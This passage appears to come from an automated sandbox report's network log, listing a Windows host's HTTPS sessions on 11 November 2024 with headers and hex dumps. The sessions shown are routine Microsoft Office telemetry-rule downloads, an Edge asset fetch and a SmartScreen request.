65 9c c4 67 6e aa db 67 e3 a8 ed 8f 6b aa 76 80 b4 16 8c 24 0b 1f f6 95 5f f2 9f 92 ab b1 55 63 58 da 6e 0e 61 76 f0 33 20 c6 84 2f 66 2b 98 65 44 62 8e Data Ascii: ckVPgKHD_Osz4lL[O)ZoNce}x8.P'{(z~QVp^Kcpoz}]?WDiZWLZ/F?NqZ2V0a,"<7j/MSFgM8'<egngkv$_UcXnav3 /f+eDb
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 33 39 b8 58 6b 99 8a 75 38 7d be a6 cb a9 b4 d4 0d a0 d0 c8 00 cd c3 89 cb 47 5e e0 9e 37 55 74 ca 22 e5 33 2e 40 d9 6b 97 0e d1 ae 6f 00 73 3d c2 55 16 ed 55 41 8c 6e 23 84 9f 7a bb a5 36 93 bb a4 ea 55 40 24 b1 d8 8d a3 80 d2 14 4c da ea c0 69 27 94 ba c3 ce 02 24 8c ee a6 dd 96 b6 6e 63 b8 1b 1f 8e 41 5c a7 55 c4 61 c5 79 bc 62 93 c3 5c ba a1 49 b2 b8 70 6e 9e c8 e6 dd c0 5f 2b 80 07 43 af 35 97 b0 01 8d ef c4 ec 80 cc 47 8d d1 06 8b 05 a6 8b 61 0e 64 1b b8 3b 29 bc 09 12 4b 6c 0e 97 55 08 0e 69 2d 37 91 ca c7 92 19 dc 58 dd ea 1b 39 22 ce 61 13 25 d3 00 18 81 ba eb c4 c0 c8 ae 76 cc e7 d3 99 0e 01 ce ee 83 20 83 f1 e6 9c c5 c1 40 5c da 36 0d a5 d4 de e6 35 93 4a 0b 9a c2 71 83 f5 b4 44 75 32 6c 17 42 96 d8 29 d5 63 e6 03 9b 84 c4 e6 04 72 d2 ca 62 95 Data Ascii: 39Xku8}G^7Ut"3.@kos=UUAn#z6U@$Li'$ncA\Uayb\Ipn_+C5Gad;)KlUi-7X9"a%v @\65JqDu2lB)crb
2024-11-11 09:33:24 UTC	16384	IN	Data Raw: 99 5a 41 18 66 53 40 00 a5 08 06 45 74 d0 0c 89 08 06 09 34 00 19 4d 00 02 42 08 c0 42 00 04 84 00 64 84 00 02 10 0c 89 34 ac 15 72 24 5d 2b 1a ae 92 4d 2b 05 5c 89 09 03 19 04 5d 05 99 9e 41 24 8e f2 71 25 68 08 41 5e 4c 5a 02 68 06 02 69 17 aa a0 e2 39 1a d0 05 08 99 e6 a8 5c 44 f4 48 13 01 4c a6 65 ac 2e 21 b0 8e f4 a5 12 a8 5c 43 48 84 e5 9c c9 aa cd 26 13 96 61 49 47 54 81 09 4d 93 2a 83 84 81 c4 6b 92 cd b5 f0 ba ce aa 62 44 b5 a6 a9 8e 25 16 eb 0e 95 2a 84 98 97 47 af 82 cd 1f e8 90 46 51 3e 2b 83 72 88 b1 ee f6 bd 2d aa e6 e5 b3 9f 07 6e 9b 6a 3e e4 34 5b 22 ef fb 6e 7d aa 16 64 08 02 da 48 69 f0 8f 89 0b cb aa 68 8d 2f af 4f ba aa f6 ca ef 5a 8c 73 ad b4 d2 ff 00 64 53 ed c1 d6 8d a1 b1 21 90 23 ea f3 b1 52 53 63 dd 20 b4 81 c9 cd 3e be 6b 8f f0 Data Ascii: ZAfS@Et4MBBd4r$]+M+\]A$q%hA^LZhi9\DHLe.!\CH&aIGTMkbD%GFQ>+r-nj>4["n}dHih/OZsdS!#RSc >k
2024-11-11 09:33:24 UTC	7952	IN	Data Raw: f3 0a 91 71 e3 e5 e8 5c 78 b9 3b 62 98 e9 e2 ed b7 37 14 d5 3d 7c 3f 45 c8 e6 3c 15 27 17 c5 81 3e 0b 92 ee c8 8a 6f c1 d9 67 0c d5 5d b8 f8 2d c2 e7 76 ae 1a 11 e1 ef 5c b7 77 c5 14 f5 87 65 9e 77 79 57 67 93 a3 0b 9d 8a ae 90 3d 7a ae 0b bb f0 ed f1 7a 13 1e d9 bc e8 ab 73 82 fe 18 d7 e2 b9 c5 d5 9b f3 37 be 3d e1 71 62 bf 0f 93 bb 0e dc fb b3 e9 7f b3 bb 05 b8 fc de 7e 2d c8 f7 a9 f5 b7 dd d3 dd 1c 7c 4f bd 73 05 47 bb 27 b3 a0 3e 92 b8 33 9e 9e 50 ef c1 4c 7b b5 76 cc 3d 1f c6 3a f9 cf dd e7 63 aa 7d fa 7b 22 7f 57 62 dc 5d fe 6f 4a e4 9c 64 66 e1 e1 ef 5e 66 7c bc bf 47 a7 f8 c7 08 f1 fb 3d 4c b9 f9 fe af 2f f2 98 d6 7c 3e ee 83 9c 3e a1 e3 3e d5 cb ec 89 f9 8a e1 a6 99 e9 3e 4f 4b bc 88 f7 61 e8 55 54 47 18 f3 79 5d dc cf bc e8 17 73 5c c3 b3 8c cf Data Ascii: q\x;b7=\|?E<'>og]-v\wewyWg=zzs7=qb~-\|OsG'>3PL{v=:c}{"Wb]oJdf^f\|G=L/\|>>>>OKaUTGy]s\

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 1c99e56d-601e-0097-76d5-33f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968qj8jrhC1EWRh41s00000004p00000000059a4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.5	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e1dc95e-801e-007b-6ed5-33e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968xlwnmhC1EWR0sv800000004ng000000002d4c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49831	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:25 UTC	556	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Thu, 07 Nov 2024 20:03:34 GMT ETag: 0x8DCFF6742E8F24C x-ms-request-id: fb6e1845-301e-0020-3c1c-3404cb000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093324Z-174f7845968frfdmhC1EWRxxbw00000004s000000000641q Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	15828	IN	Data Raw: 1f 8b 08 08 16 1d 2d 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: -gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-11 09:33:25 UTC	16384	IN	Data Raw: 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0 b1 dc 86 43 a9 41 db Data Ascii: e\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7CA
2024-11-11 09:33:25 UTC	16384	IN	Data Raw: 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd f5 40 34 cd c4 ce 27 Data Ascii: kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkXpZs>"q@4'
2024-11-11 09:33:25 UTC	16384	IN	Data Raw: 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65 84 fb 4f 5b 04 9b a8 Data Ascii: _CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}eO[
2024-11-11 09:33:25 UTC	5227	IN	Data Raw: 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e 26 d2 d8 ca 80 2c 56 f9 34 27 86 21 28 e6 0e 92 0c 4e 75 b7 Data Ascii: a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.&,V4'!(Nu

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: f5f8c6aa-e01e-0099-78d5-33da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968frfdmhC1EWRxxbw00000004sg0000000067af x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 602c134e-d01e-0049-04d5-33e7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968t42glhC1EWRa36w00000004hg0000000022qr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:24 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 5fec14be-a01e-0021-75d5-33814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093324Z-174f7845968l4kp6hC1EWRe884000000050g000000004nsq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49837	4.150.155.223	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:24 UTC	723	OUT	POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 725 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoidEJ4amVzS0dpVGowRmhyZXVOTVFZZz09IiwgImhhc2giOiI1NVlzQlBNWkN2OD0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "636976985063396749.rel.v2" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-11 09:33:24 UTC	725	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-11 09:33:25 UTC	248	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: application/octet-stream Content-Length: 57 Connection: close Server: Kestrel ETag: "638343870221005468" Request-Context: appId=cid-v1:a302ffdc-66e2-4f15-929a-164afd2d2584
